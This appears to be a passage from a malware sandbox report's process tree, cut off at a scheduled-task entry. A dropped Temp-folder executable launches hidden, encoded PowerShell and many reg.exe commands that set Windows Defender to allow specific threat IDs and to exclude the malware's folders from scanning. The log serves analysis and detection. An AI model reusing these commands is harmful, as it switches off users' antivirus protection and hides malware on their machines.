                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3624 -ip 3624
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:804
                                                                                                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\WerFault.exe -pss -s 548 -p 4544 -ip 4544
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:2844
                                                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 556 -p 1388 -ip 1388
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              PID:1576
                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:3680
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4296 -ip 4296
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:5760
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3124 -ip 3124
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:2996
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 3624 -ip 3624
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:5332
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\sOpKwDq.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\sOpKwDq.exe j6 /site_id 525403 /S
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                                                      PID:5824
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                        PID:5028
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                          PID:4992
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                              PID:6120
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:5964
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:3000
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:5516
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:1284
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:3652
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:5852
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:4960
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:5504
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:4760
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:2636
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:5288
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:5984
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:1448
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:4360
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:5184
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:5940
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:4796
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:3044
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:1964
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:5592
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                      PID:2164
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:5680
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:5412
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                        PID:4556
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:1444
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                PID:4432
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:2244
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:804
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:3692
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                      PID:4936
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                        PID:5344
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                          PID:6120
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                            PID:3916
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                              PID:1068
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                PID:4064
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:1056
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:4252
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:5964
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:428
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1700
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:5312
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
